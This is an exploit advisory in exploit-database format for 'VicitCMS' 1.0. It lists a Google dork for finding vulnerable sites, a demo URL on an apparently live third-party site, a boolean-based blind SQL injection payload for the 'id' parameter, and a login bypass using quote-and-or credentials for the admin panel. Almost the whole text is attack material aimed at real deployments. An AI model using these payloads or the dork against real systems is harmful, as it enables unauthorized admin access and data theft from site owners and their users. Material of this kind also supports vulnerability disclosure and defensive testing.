*********************************************************
#Exploit Title: VicitCMS SQL Injection / Admin Panel bypass
#Date: 2022-01-30
#Exploit Author: K0uR0sH3R
#Google Dork: intext:"VicitCMS"
#Version: 1.0
#Vendor Homepage: vicitdigital.com
#Category:webapps
#Tested On: windows 10, Firefox
### Demo : https://www.lakie1.com/currnetDogs1.php?id=49
POC :
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=49' AND 9212=9212 AND 'zHua'='zHua
---
Bypass : https://www.lakie1.com/login/ :::: User:'=''or' - Pass:'=''or'
*********************************************************
#TELEGRAM: K0uR0sH3R_info
#Email: K0uR0sH3R@gmail.com
*********************************************************